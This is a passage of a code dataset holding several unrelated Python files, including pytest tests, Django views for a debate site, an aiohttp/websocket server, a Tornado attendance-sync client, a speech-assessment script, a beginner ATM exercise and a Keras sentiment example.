pytest\n\nimport pyFLUT.beta as beta\nimport pyFLUT.constructor\n\n\n@pytest.fixture(scope='module')\ndef read_SLDF_partially():\n return pyFLUT.constructor.read_ulf_run(prefix='res', directory='example/SLDF/',\n variables_range={'chist': [0, 1]})\n\nz_mean = 0.1\nz_var_scaled = 0.1\n\n\ndef test_beta_parameters():\n z_var = 0.01\n a, b = beta.beta_parameters(z_mean, z_var)\n assert a == (z_mean * (1 - z_mean) / z_var - 1) * z_mean\n assert b == (z_mean * (1 - z_mean) / z_var - 1) * (1 - z_mean)\n\n\ndef test_pdf_integration():\n #a, b = ulf.beta.beta_parameters(z_mean, z_var)\n data = pyFLUT.constructor.read_ulf('files/ulf/res_t0.05000.ulf')\n T = data['T']\n z = data['Z']\n #assert beta.calc_pdf(z, T, z_mean, z_var, n_poly=10) == 0\n plt.figure()\n z_var_scaled = [0.01, 0.1, 0.2, 0.3, 0.5, 0.9]\n\n for zvi in z_var_scaled:\n T_mean = beta.calc_pdf_zvar(z, T, zvi, n_poly=10)\n plt.plot(z, T_mean, label='Zvar={}'.format(zvi))\n #T_mean = beta.calc_pdf(z, T, 0.2, 0.012, n_poly=10)\n\n plt.plot(z, T, label='Laminar temperature')\n plt.xlabel('Z')\n plt.ylabel('T, K')\n plt.legend(loc=0)\n plt.savefig('test/test_beta_pdf_0.png')\n plt.close()\n\n\ndef test_one():\n \"\"\"\n test if the scaling of the beta-pdf is correctly done\n :return:\n \"\"\"\n Z = np.linspace(0, 1, 3)\n T = np.array([500.] 
* 3)\n\n T_mean = beta.calc_pdf(Z, T, 0.5, 0.1, n_poly=10)\n assert np.isclose(T_mean, T[0])\n","sub_path":"test/test_beta_pdf.py","file_name":"test_beta_pdf.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349090458","text":"from django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom django.http import HttpResponse\n\nfrom django.conf import settings\n\nfrom django_filters import FilterSet\n\nfrom haystack.query import SearchQuerySet\n\nfrom dal import autocomplete\n\nfrom django_tables2 import Column\n\nfrom core.utils.generics import (\n CustomListView,\n CustomTable,\n CustomCreateView,\n CustomUpdateView,\n CustomDetailView,\n CustomDeleteView\n)\nfrom core.utils.rounds import get_tab_card_data\nfrom core.models.round import Round\nfrom core.models.debater import Debater\nfrom core.models.results.team import TeamResult\nfrom core.models.standings.toty import TOTY\n\nfrom core.forms import DebaterForm\nfrom core.utils.perms import has_perm\n\n\nclass DebaterFilter(FilterSet):\n class Meta:\n model = Debater\n fields = {\n 'id': ['exact'],\n 'first_name': ['icontains'],\n 'last_name': ['icontains'],\n 'school__name': ['icontains'],\n 'status': ['exact']\n }\n\n\nclass DebaterTable(CustomTable):\n id = Column(linkify=True)\n\n first_name = Column(linkify=True)\n last_name = Column(linkify=True)\n\n school_name = Column(verbose_name='School',accessor='school.name')\n\n class Meta:\n model = Debater\n fields = ('id',\n 'first_name',\n 'last_name',\n 'school_name',\n 'status')\n\n\nclass DebaterListView(CustomListView):\n public_view = True\n model = Debater\n table_class = DebaterTable\n template_name = 'debaters/list.html'\n\n filterset_class = DebaterFilter\n\n buttons = [\n {\n 'name': 'Create',\n 'href': reverse_lazy('core:debater_create'),\n 'perm': 'core.add_debater',\n 'class': 'btn-success'\n }\n ]\n\n\ndef num_distinct_tournaments(team):\n return len(list(set([result.tournament.id for result in team.team_results.all()])))\n\n\nclass DebaterDetailView(CustomDetailView):\n public_view = True\n model = Debater\n template_name = 'debaters/detail.html'\n\n buttons = [\n {\n 'name': 'Delete',\n 'href': 'core:debater_delete',\n 'perm': 'core.remove_debater',\n 'class': 'btn-danger',\n 'include_pk': True\n },\n {\n 'name': 'Edit',\n 'href': 'core:debater_update',\n 'perm': 'core.change_debater',\n 'class': 'btn-info',\n 'include_pk': True\n },\n ]\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n tournaments = []\n\n tournaments = [result.tournament \\\n for result in TeamResult.objects.filter(\n team__debaters=self.object\n ).all()]\n tournaments += [result.tournament \\\n for result in self.object.speaker_results.all()]\n\n if 'all' in self.request.GET:\n for team in self.object.teams.all():\n tournaments += [round.tournament for round in team.govs.all()]\n tournaments += [round.tournament for round in team.opps.all()]\n\n tournaments = list(set(tournaments))\n\n seasons = [tournament.season for tournament in tournaments]\n seasons = list(set(seasons))\n\n seasons.sort(key=lambda season: season, reverse=True)\n current_season = settings.CURRENT_SEASON\n\n if not len(seasons) == 0:\n current_season = self.request.GET.get('season', seasons[0])\n\n if current_season == '':\n current_season = seasons[0]\n\n seasons = [season \\\n for season in settings.SEASONS if season[0] in seasons]\n\n seasons.sort(key=lambda season: 
season[0], reverse=True)\n\n context['seasons'] = seasons\n\n context['current_season'] = current_season\n\n tournaments = [tournament \\\n for tournament in tournaments if tournament.season == current_season]\n\n tournaments.sort(key=lambda tournament: tournament.date)\n\n tournament_render = []\n\n for tournament in tournaments:\n to_add = {}\n to_add['tournament'] = tournament\n to_append = []\n\n to_append += [('team', result) \\\n for result in TeamResult.objects.filter(\n team__debaters=self.object\n ).filter(\n tournament=tournament\n ).order_by('-type_of_place').all()]\n to_append += [('speaker', result) \\\n for result in self.object.speaker_results.filter(\n tournament=tournament\n ).order_by('-type_of_place').all()]\n\n team_result = TeamResult.objects.filter(\n team__debaters=self.object\n ).filter(\n tournament=tournament\n ).first()\n\n gov_round = Round.objects.filter(\n gov__debaters=self.object\n ).filter(\n tournament=tournament\n )\n\n opp_round = Round.objects.filter(\n opp__debaters=self.object\n ).filter(\n tournament=tournament\n )\n\n # THIS IS WHERE YOU HAVE TO CHANGE THINGS #\n team = None if not team_result else team_result.team\n\n if not team and (gov_round.exists() or opp_round.exists()):\n if gov_round.exists():\n team = gov_round.first().gov\n else:\n team = opp_round.first().opp\n\n to_add['team'] = team\n to_add['data'] = to_append\n to_add['tab_card'] = get_tab_card_data(team, tournament)\n\n tournament_render.append(to_add)\n\n context['results'] = tournament_render \n\n context['totys'] = TOTY.objects.filter(\n team__debaters=self.object\n ).order_by(\n 'place',\n 'season'\n )\n\n context['sotys'] = self.object.soty.order_by(\n 'place',\n 'season'\n )\n\n context['notys'] = self.object.noty.order_by(\n 'place',\n 'season'\n )\n\n teams = [team for team in self.object.teams.all()]\n teams.sort(key=lambda team: (num_distinct_tournaments(team), team.toty_points), reverse=True)\n\n context['teams'] = teams\n\n context['videos'] = []\n context['videos'] += list(self.object.pm_videos.all())\n context['videos'] += list(self.object.lo_videos.all())\n context['videos'] += list(self.object.mg_videos.all())\n context['videos'] += list(self.object.mo_videos.all())\n\n context['videos'] = [video for video in context['videos']\n if has_perm(self.request.user, video)]\n\n return context\n\n\nclass DebaterUpdateView(CustomUpdateView):\n model = Debater\n\n form_class = DebaterForm\n template_name = 'debaters/update.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n context['totys'] = TOTY.objects.filter(\n team__debaters=self.object\n ).order_by(\n 'place',\n 'season'\n )\n\n context['sotys'] = self.object.soty.order_by(\n 'place',\n 'season'\n )\n\n context['notys'] = self.object.noty.order_by(\n 'place',\n 'season'\n )\n\n teams = [team for team in self.object.teams.all()]\n teams.sort(key=lambda team: (num_distinct_tournaments(team), team.toty_points), reverse=True)\n\n context['teams'] = teams\n\n return context \n\n\nclass DebaterCreateView(CustomCreateView):\n model = Debater\n\n form_class = DebaterForm\n template_name = 'debaters/create.html'\n\n def post(self, *args, **kwargs):\n to_return = super().post(*args, **kwargs)\n\n if 'ajax' in self.request.POST:\n return HttpResponse(self.object.id)\n return to_return\n\n\nclass DebaterDeleteView(CustomDeleteView):\n model = Debater\n success_url = reverse_lazy('core:debater_list')\n\n template_name = 'debaters/delete.html'\n\n\nclass 
DebaterAutocomplete(autocomplete.Select2QuerySetView):\n def get_result_label(self, record):\n return '<%s> %s (%s)' % (record.id,\n record.name,\n record.school.name)\n \n def get_queryset(self):\n qs = None\n if not self.q:\n qs = Debater.objects\n if self.q:\n qs = SearchQuerySet().models(Debater).filter(content=self.q)\n\n qs = [q.pk for q in qs.all()]\n\n qs = Debater.objects.filter(id__in=qs)\n\n qs = qs.order_by('-pk')\n\n school = self.forwarded.get('school', None)\n\n if school:\n qs = qs.filter(school__id=school)\n\n return qs\n \n","sub_path":"core/views/debater_views.py","file_name":"debater_views.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596957015","text":"import aiohttp_jinja2\nimport asyncio\nimport configparser\nimport logging\nimport jinja2\nimport websockets\n\nimport views\nimport games\n# import generic.game.base\n\nfrom aiohttp import server, web\nfrom time import gmtime, strftime\n\nfrom generic import routes\n\nDEBUG = True\n\n\nclass BaseCommandServer(object):\n\n def __init__(self, server_type=None, host=None, port=None, loop=None):\n logging.info('Init %s Server on host %s:%s' % (server_type, host, port))\n self._server_type = server_type\n self._loop = loop or asyncio.get_event_loop()\n self._init_server(host, port)\n\n def start(self):\n self._server = self._loop.run_until_complete(self._server)\n logging.info(' %s has started.' % (self._server_type))\n\n def stop(self):\n self._server.close()\n logging.info('%s has stopped.' % (self._server_type))\n\n\nclass StreamCommandServer(BaseCommandServer):\n _instance = None\n\n def _init_server(self, host, port):\n self._app = web.Application(loop=self._loop)\n self._server = websockets.serve(self.process_request, host, port)\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(StreamCommandServer, cls).__new__(cls)\n return cls._instance\n\n @asyncio.coroutine\n def process_request(self, websocket, path):\n while True:\n yield from websocket.send(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n yield from asyncio.sleep(2)\n yield from websocket.close()\n\n\nclass HttpCommandServer(BaseCommandServer):\n _instance = None\n\n def _init_server(self, host, port):\n self._app = web.Application()\n self._load_routes()\n self._server = self._loop.create_server(self._app.make_handler(),\n host, port)\n\n def __init__(self, templates=None, **kwargs):\n super().__init__(**kwargs)\n if templates:\n aiohttp_jinja2.setup(self._app,\n loader=jinja2.FileSystemLoader(templates))\n \n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(HttpCommandServer, cls).__new__(cls)\n return cls._instance\n\n def _load_routes(self):\n logging.debug('Loading Application Routes:\\n%s' % '\\n'.join(str(r) for r in routes.ROUTES))\n for route in routes.ROUTES:\n self._app.router.add_route(*route)\n\n\nif __name__ == '__main__':\n config = configparser.ConfigParser()\n config.read('etc/command_server.conf')\n host = config.get('commandServer', 'host')\n port = config.get('commandServer', 'port')\n templates = config.get('commandServer', 'templates')\n logging.basicConfig(level=logging.DEBUG)\n loop = asyncio.get_event_loop()\n server = HttpCommandServer(server_type='Http Server', host=host, port=port, loop=loop, templates=templates)\n socket_server = StreamCommandServer(server_type='Stream Server', host=host, port=8765, loop=loop)\n try:\n server.start()\n socket_server.start()\n 
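# NOTE: run_forever() blocks here, servicing both the HTTP command server and the websocket stream server on this shared event loop until interrupted.\n        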
loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n server.stop()\n socket_server.stop()\n loop.close()\n","sub_path":"command_server/command_server.py","file_name":"command_server.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"625398354","text":"# -*- coding: utf-8 -*-\n\n#import urllib2\nfrom tornado import curl_httpclient\nfrom tornado.curl_httpclient import CurlAsyncHTTPClient\nfrom tornado.ioloop import IOLoop\nfrom tornado.httpclient import HTTPRequest\nfrom tornado.httputil import HTTPHeaders\nimport urllib\n\nDefault_URL = {\n 'updateStudent' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/updateStudent',\n 'SyncAttLog' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/syncRecord',\n 'NewRecord' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/newRecord',\n 'getStudent' : 'http://www.jzk12.com/weiphp30/index.php?s=/addon/DailyTime/DailyTime/getStudent',\n 'GetCmd' : 'http://',\n }\n\nClIENT_TOKEN = 'gh_2837e31e28ed'\n\nclass ServerHandler() :\n\n def __init__(self):\n self.url_list = Default_URL;\n self.http_client = CurlAsyncHTTPClient()\n self.stdudents_buf = []\n def updateStudents(self,sn,fresh=False):\n if (len(self.stdudents_buf) != 0) and (False == fresh) :\n return;\n self.stdudents_buf = []\n data = {'token':ClIENT_TOKEN,'SN':sn}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['updateStudent'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_updateStudents)\n def resp_updateStudents(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_updateStudents : \",response.body)\n def get_updated_students(self):\n return self.stdudents_buf\n\n\n def newRecord(self,record,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn,'record':record}\n data_send = urllib.parse.urlencode(data)\n print(\"data_send : \", data_send)\n request = HTTPRequest(url=self.url_list['NewRecord'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_newRecord)\n def resp_newRecord(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_newRecord : \", response.body)\n\n def syncAttLog(self,records,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn,'records':records}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['SyncAttLog'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_syncAttLog)\n def resp_syncAttLog(self,response):\n #if response.error:\n # print(\"Error:\", response.error)\n #else:\n print(\"resp_syncAttLog : \", response.body)\n\n\n def getServerCmd(self,sn):\n data = {'token':ClIENT_TOKEN,'SN':sn}\n data_send = urllib.parse.urlencode(data)\n request = HTTPRequest(url=self.url_list['GetCmd'],method='POST', body=data_send,\n follow_redirects=False,proxy_host='135.251.103.45', proxy_port=8080,\n connect_timeout=200, request_timeout=600)\n self.http_client.fetch(request, self.resp_getServerCmd)\n def resp_getServerCmd(self,response):\n #if response.error:\n # 
print(\"Error:\", response.error)\n #else:\n print(\"resp_getServerCmd : \", response.body)\n\n\nSERVER_Handler = ServerHandler();\n\nif __name__ == \"__main__\":\n sn = '3637165101475'\n record = {\n 'PIN': '101010101010',\n 'TIME': '2017-08-03 11:30:28',\n 'STATUS': 255,\n 'VERIFY': '2',\n 'WORKCODE': '0',\n 'RESERVED1': '0',\n 'RESERVED2': '0'\n }\n\n SvHd = SERVER_Handler\n #SvHd.updateStudents()\n SvHd.newRecord(record,sn)\n IOLoop.instance().start()\n","sub_path":"connectToServer.py","file_name":"connectToServer.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605327192","text":"import sys\ndef my_except_hook(exctype, value, traceback):\n print('There has been an error in the system')\n \nimport warnings\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nimport parselmouth\nfrom parselmouth.praat import call, run_file\nimport glob\nimport errno\nimport csv,sys\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport time\nimport os\nfrom subprocess import check_output\nfrom sklearn import preprocessing\nimport queue\nimport soundfile as sf\nimport _thread \nimport pickle\nfrom scipy.stats import binom\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import ttest_ind\nfrom pandas import read_csv\n\n\n\naudioFilesPath=\"dataset\"+\"/\"+\"VAHAN-monologue-30\"+\"/\" # Path for audio-files\n\npa1=\"dataset\"+\"/\"+\"datanewchi22.csv\"\npa2=\"dataset\"+\"/\"+\"stats.csv\"\npa3=\"dataset\"+\"/\"+\"datacorrP.csv\"\npa4=\"dataset\"+\"/\"+\"datanewchi.csv\"\npa5=\"dataset\"+\"/\"+\"datanewchi33.csv\"\npa6=\"dataset\"+\"/\"+\"datanewchi33.csv\"\npa7=\"dataset\"+\"/\"+\"datanewchi44.csv\"\n\n\npa8=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"MLTRNL.praat\"\npa9=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"myspsolution.praat\"\n\n\nresult_array = np.empty((0, 27))\n\n\ndef mysppron(m,p,q):\n\tsound=m\n\tsourcerun=p \n\tpath=q\n\tobjects= run_file(sourcerun, -20, 2, 0.3, \"yes\",sound,path, 80, 400, 0.01, capture_output=True)\n\t#print(objects[0],objects[1]) # This will print the info from the sound object, and objects[0] is a parselmouth.Sound object\n\tz1=str(objects[1]) # This will print the info from the textgrid object, and objects[1] is a parselmouth.Data object with a TextGrid inside\n\tz2=z1.strip().split()\n\tz3=int(z2[13]) # will be the integer number 10\n\tz4=float(z2[14]) # will be the floating point number 8.3\n\tdb= binom.rvs(n=10,p=z4,size=10000)\n\ta=np.array(db)\n\tb=np.mean(a)*100/10\n\tprint (\"Pronunciation_posteriori_probability_score_percentage= :%.2f\" % (b))\n\treturn round(b,2)\npronunciation = []\nfiles = []\nfor soundi in os.listdir(audioFilesPath):\n\tif soundi.endswith('.mp3'):\n\t\tfiles.append(soundi)\n\t\tsoundi = os.path.join(audioFilesPath,soundi)\n\t\tprint(soundi)\n\t\t#Pronunciation_posteriori_probability_score_percentage\n\t\tbi=mysppron(soundi,pa9,audioFilesPath)\n\t\tpronunciation.append(bi)\n\t\t# feature extraction\n\t\tobjects= run_file(pa8, -20, 2, 0.3, \"yes\", soundi, audioFilesPath, 80, 400, 0.01, capture_output=True)\n\t\tz1=( objects[1]) # This will print the info from the textgrid object, and objects[1] is a parselmouth.Data object with a TextGrid inside\n\t\tz3=z1.strip().split()\n\t\tz2=np.array([z3])\n\t\tresult_array=np.append(result_array,[z3], axis=0)\nprint(pronunciation)\t\nnp.savetxt(pa1,result_array, fmt='%s',delimiter=',')\n\n#Data and features analysis \ndf = 
pd.read_csv(pa1,\n\t\t\t\t\t\tnames = ['avepauseduratin','avelongpause','speakingtot','avenumberofwords','articulationrate','inpro','f1norm','mr','q25',\n\t\t\t\t\t\t\t\t'q50','q75','std','fmax','fmin','vowelinx1','vowelinx2','formantmean','formantstd','nuofwrds','npause','ins',\n\t\t\t\t\t\t\t\t'fillerratio','xx','xxx','totsco','xxban','speakingrate'],na_values='?')\n\nscoreMLdataset=df.drop(['xxx','xxban'], axis=1)\nscoreMLdataset.to_csv(pa7, header=False,index = False)\nnewMLdataset=df.drop(['avenumberofwords','f1norm','inpro','q25','q75','vowelinx1','nuofwrds','npause','xx','totsco','xxban','speakingrate','fillerratio'], axis=1)\nnewMLdataset.to_csv(pa5, header=False,index = False)\nnamess=nms = ['avepauseduratin','avelongpause','speakingtot','articulationrate','mr',\n\t\t\t\t\t\t\t\t'q50','std','fmax','fmin','vowelinx2','formantmean','formantstd','ins',\n\t\t\t\t\t\t\t\t'xxx']\ndf1 = pd.read_csv(pa5,\n\t\t\t\t\t\tnames = namess)\ndf33=df1.drop(['xxx'], axis=1)\nprint(df33)\narray = df33.values\narray=np.log(array)\nx = array[:,0:13]\n\nprint(\" \")\nprint(\" \")\nprint(\"====================================================================================================\")\nprint(\"HERE ARE THE RESULTS, your spoken language level (speaking skills).\")\nprint(\"a: just started, a1: beginner, a2: elementary, b1: intermediate, b2: upper intermediate, c: master\") \nprint(\"====================================================================================================\")\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"CART_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_CART_model = model.predict(x)\npredictions_proba_CART_model = list(model.predict_proba(x))\nprint(\"CART MODEL 58% Accuracy\")\nprint(predictions_CART_model)\nprint(model.predict_proba(x))\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"KNN_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_KNN_model = model.predict(x)\npredictions_proba_KNN_model = list(model.predict_proba(x))\nprint(\"65% accuracy \",predictions_KNN_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"LDA_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_LDA_model = model.predict(x)\npredictions_proba_LDA_model = list(model.predict_proba(x))\nprint(\"70% accuracy \",predictions_LDA_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"LR_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_LR_model = model.predict(x)\npredictions_proba_LR_model = list(model.predict_proba(x))\nprint(\"67% accuracy \",predictions_LR_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"NB_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_NB_model = model.predict(x)\npredictions_proba_NB_model = list(model.predict_proba(x))\nprint(\"64% accuracy \",predictions_NB_model)\n\nfilename=\"dataset\"+\"/\"+\"essen\"+\"/\"+\"SVN_model.sav\"\nmodel = pickle.load(open(filename, 'rb'))\npredictions_SVN_model = model.predict(x)\nprint(\"63% accuracy \",predictions_SVN_model)\n# print(np.array(predictions_SVN_model).shape)\n\n\n\ndataSave = pd.DataFrame({\n\t\"files\" : files,\n\t\"pronunciation\" : pronunciation,\n\t\"predictions_CART_model\" : predictions_CART_model,\n\t\"predictions_proba_CART_model\" : predictions_proba_CART_model,\n\t\"predictions_KNN_model\" : predictions_KNN_model,\n\t\"predictions_proba_KNN_model\" : predictions_proba_KNN_model,\n\t\"predictions_LDA_model\" : predictions_LDA_model,\n\t\"predictions_proba_LDA_model\" : 
predictions_proba_LDA_model,\n\t\"predictions_LR_model\" : predictions_LR_model,\n\t\"predictions_proba_LR_model\" : predictions_proba_LR_model,\n\t\"predictions_NB_model\" : predictions_NB_model,\n\t\"predictions_proba_NB_model\" : predictions_proba_NB_model,\n \n\t\"predictions_SVN_model\" : predictions_SVN_model\n})\n\n# Result file name \ndataSave.to_csv('VAHAN-monologue-30_result.csv',index=False)","sub_path":"spokenlanguageassessment.py","file_name":"spokenlanguageassessment.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272051497","text":"from functools import lru_cache\n\n@lru_cache(maxsize = 10000)\ndef fibonacci(n):\n if n == 1:\n return 1\n if n == 2:\n return 1\n if n > 2:\n return fibonacci(n-2) + fibonacci(n-1)\nfor i in range(2, 501):\n print(fibonacci(i)/fibonacci(i-1))\n","sub_path":"recursion_practise.py","file_name":"recursion_practise.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"499012410","text":"import datetime\n\nimport datefuncs\n\nMONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\ndef single_month_end(month, year, col_tag):\n tag_label = '%s %d' % (MONTHS[month-1], year)\n \n end_of_this_month = datefuncs.end_of_month(month,year)\n end_of_prev_month = datefuncs.end_of_prev_month(month,year)\n \n columns = [end_of_prev_month.isoformat(), col_tag, end_of_this_month.isoformat()]\n column_titles = [end_of_prev_month.isoformat(), tag_label, end_of_this_month.isoformat()]\n return columns, column_titles\n \ndef single_quarter_end(quarter, year, col_tag):\n tag_label = 'Q%s %d' % (quarter, year)\n \n end_of_this_qtr = datefuncs.end_of_quarter(quarter,year)\n end_of_prev_qtr = datefuncs.end_of_prev_quarter(quarter,year)\n \n columns = [end_of_prev_qtr.isoformat(), col_tag, end_of_this_qtr.isoformat()]\n column_titles = [end_of_prev_qtr.isoformat(), tag_label, end_of_this_qtr.isoformat()]\n return columns, column_titles\n \n\ndef quarterly_periods(year):\n columns = ['%sQ%d' % (year, x) for x in range(1,5)]\n column_titles = ['Q1', 'Q2', 'Q3', 'Q4']\n return columns, column_titles\n\ndef quarter_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year)).isoformat()]\n column_titles = ['end of %d' % (int(year)-1)]\n\n for q in [1,2,3,4]:\n columns.append(datefuncs.end_of_quarter(q, int(year)).isoformat())\n column_titles.append('end of Q%d' %q)\n \n return columns, column_titles\n\ndef annual_periods(year):\n columns = ['%s' % year]\n column_titles = [str(year)]\n return columns, column_titles\n\ndef annual_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year)).isoformat(), year, datefuncs.end_of_year(int(year)).isoformat()]\n column_titles = ['end of %d' % (int(year)-1), 'chg in %s' % year, 'end of %s' % year]\n return columns, column_titles\n\ndef monthly_periods(year):\n columns = ['%sM%s' % (year, '%02d' % x) for x in range(1,13)]\n column_titles = MONTHS \n return columns, column_titles\n\ndef monthly_ends(year):\n columns = [datefuncs.end_of_prev_year(int(year))] + datefuncs.month_ends(int(year))\n columns = [x.isoformat() for x in columns]\n column_titles = ['end of %d' % (int(year)-1)] + MONTHS\n return columns, column_titles\n\ndef trailing_monthly_periods(dt):\n next_month = datefuncs.start_of_next_month(dt)\n start = datetime.date(dt.year-1,dt.month,1)\n finish = dt\n\n months = list(datefuncs.monthrange(start, 
finish))\n columns = ['%sM%s' % (x[0], '%02d' % x[1]) for x in months]\n column_titles = columns\n \n return columns, column_titles\n\ndef trailing_monthly_ends(dt):\n next_month = datefuncs.start_of_next_month(dt)\n start = datetime.date(dt.year-1,dt.month,1)\n finish = dt\n\n months = list(datefuncs.monthrange(start, finish))\n columns = [datefuncs.end_of_month(x[1],x[0]).isoformat() for x in months]\n column_titles = columns \n \n return columns, column_titles\n\ndef multiyear_periods(dt, years):\n start = datefuncs.start_of_month(dt.month, dt.year)\n finish = datetime.date(start.year + years, start.month, start.day)\n\n months = list(datefuncs.monthrange(start, finish))\n\n columns = ['%sM%s' % (x[0], '%02d' % x[1]) for x in months]\n column_titles = columns\n\n return columns, column_titles\n \ndef multiyear_ends(dt, years):\n start = datefuncs.start_of_month(dt.month, dt.year)\n finish = datetime.date(start.year + years, start.month, start.day)\n\n months = list(datefuncs.monthrange(start, finish))\n\n columns = [datefuncs.end_of_month(x[1],x[0]).isoformat() for x in months]\n column_titles = columns\n\n return columns, column_titles\n","sub_path":"accountifie/toolkit/utils/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88272950","text":"Balance=50000\r\n#this function is for entering your pin code number:....\r\ndef pin_code():\r\n print(\"Please insert your card\")\r\n i=1\r\n while i<=3:\r\n #print(\"please insert your card\\n\")\r\n pin=input(\"enter the pin code: \")\r\n if pin==\"1234\":\r\n print(\"your pin code is correct\\n\")\r\n print(\"Please wait\\n\")\r\n print(\"Thank You\")\r\n break\r\n print(\"chance\",3-i)\r\n i=i+1\r\nprint(\"you already used 3 chances and now your pin card is\\nblocked\")\r\n \r\n#this function is for transactions and the saving account:.....\r\ndef option2():\r\n print(\"choose any withdrawal option:\\n \")\r\n #1.saving\r\n #2.current or credit\r\n option2=input(\"enter the withdrawal option:\\n \")\r\n if option2==\"2\":\r\n trans_action()\r\n pin_code()\r\n elif option2==\"1\":\r\n print(\"SAVING\")\r\n print(Balance)\r\n#this function is for choosing an option to process... \r\ndef option1():\r\n option1=input(\"enter any option: \")\r\n if option1==\"1\":\r\n print(\"CASH WITHDRAWAL\")\r\n print(\"1.SAVING\\n2.CURRENT or CREDIT\\n\")\r\n option2()\r\n elif option1==\"2\":\r\n print(\"BALANCE INQUIRY\")\r\n print(\"In your account you have balance: \",Balance)\r\n#this function is for your transaction......
\ndef trans_action():\n #Balance=50000\n transaction=int(input(\"enter the amount\\nHow much amount do you want: \"))\n if transaction>Balance:\n print(\"Insufficient balance in your account\")\n else:\n print(\"your transaction is being processed\")\n\n# this is the main function for calling the other functions.....\ndef A_T_M():\n #Balance=500000\n print(\"WELCOME TO ATM\\n\")\n print(\"you have to choose a language:\\n1.English\\n2.Hindi\\n\")\n language=input(\"enter the language: \")\n if language==\"1\":\n print(\"choose any option \\n1.CASH WITHDRAWAL\\n2.BALANCE INQUIRY\\n\")\n option1()\n #pin_code()\n else:\n print(\"only the English language is available\")\nA_T_M()\n","sub_path":"ATM_in_function/ATM_Question_in_Function.py","file_name":"ATM_Question_in_Function.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443291883","text":"from tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Embedding\n\nimport numpy as np\n\n\n\ndocs = ['너무 재밌네요', '최고예요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다', \\\n '한번 더 보고 싶네요', '글쎄요', '별로예요', '생각보다 지루하네요', '연기가 어색해요', '재미없어요']\n\ndocs_class = np.array([1,1,1,1,1,0,0,0,0,0])\n\n\n\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\n\n\n\nx = token.texts_to_sequences(docs)\n\npadding_x = pad_sequences(x, 4)\n\n\n\nword_size = len(token.word_index) + 1\nmodel = Sequential()\nmodel.add(Embedding(word_size, 8, input_length=4))\nmodel.add(Flatten())\nmodel.add(Dense(1, activation=\"sigmoid\"))\n\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nmodel.fit(padding_x, docs_class, epochs=20)\n\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(padding_x, 